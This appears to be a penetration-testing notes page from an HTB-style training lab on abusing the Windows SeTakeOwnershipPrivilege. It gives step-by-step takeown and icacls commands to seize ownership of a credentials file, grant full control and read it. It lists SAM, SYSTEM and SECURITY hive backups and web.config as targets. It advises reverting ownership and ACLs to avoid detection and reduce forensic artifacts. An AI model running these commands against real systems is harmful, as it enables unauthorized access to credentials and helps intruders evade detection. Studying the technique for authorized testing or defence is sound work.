setakeownershipprivilege

Exploiting SeTakeOwnershipPrivilege

Overview

SeTakeOwnershipPrivilege allows a user to take ownership of files and folders, enabling modification of access control lists (ACLs) to gain unauthorized access to restricted data.

Approach

1. Verify Privileges

whoami /priv  # Check for SeTakeOwnershipPrivilege

2. Enable Privilege (if required)

Use PowerShell scripts such as:

Enable-Privilege.ps1EnableAllTokenPrivs.ps1

3. Identify Target Files/Folders

Locate sensitive files and gather metadata:

Get-ChildItem -Path <directory> -Recurse  # Enumerate files
cmd /c dir /q  # Check file owner

4. Take Ownership of Target File

takeown /f <target>

OR using PowerShell:

Set-Acl -Path <target> -AclObject (Get-Acl <target>)

5. Modify ACLs to Gain Access

icacls <target> /grant <user>:F  # Full control to user

6. Access Data

cat <target>  # Read the file

OR:

type <target>

7. Revert Changes

Reset ownership and ACLs to avoid detection:

icacls <target> /reset

Get information about the target file

Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

Checking file ownership

… means - you can ownership

cmd /c dir /q 'C:\Department Shares\Private\IT'

Take ownership of a file (takeown)

takeown /f 'C:\Department Shares\Private\IT\cred.txt'

Confirm ownership change

Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

Modify the file ACL

icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

Some interesting files to check

c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav

Tools & Techniques

Commands Used:

whoami /priv
takeown /f <target>
icacls <target> /grant <user>:F
Get-ChildItem
cmd /c dir /q
cat <target> / type <target>
Set-Acl

Tools:

PowerShell scripts for privilege enabling

Techniques:

Use SeTakeOwnershipPrivilege to gain access to restricted files/folders.
Modify ACLs to grant read/write permissions.
Revert changes post-exploitation to avoid disruption.

Notes

This technique requires SeTakeOwnershipPrivilege to be enabled.
Always revert permissions and ownership post-exploitation to reduce forensic artifacts.

Previousseimpersonate-and-seassignprimarytoken NextACTIVE DIRECTORY

Last updated 18 hours ago

hashtagExploiting SeTakeOwnershipPrivilege

hashtagOverview

hashtagApproach

hashtag1. Verify Privileges

hashtag2. Enable Privilege (if required)

hashtag3. Identify Target Files/Folders

hashtag4. Take Ownership of Target File

hashtag5. Modify ACLs to Gain Access

hashtag6. Access Data

hashtag7. Revert Changes

hashtagGet information about the target file

hashtagChecking file ownership

hashtagTake ownership of a file (takeownarrow-up-right)

hashtagSome interesting files to check

hashtagTools & Techniques

hashtagCommands Used:

hashtagTools:

hashtagTechniques:

hashtagNotes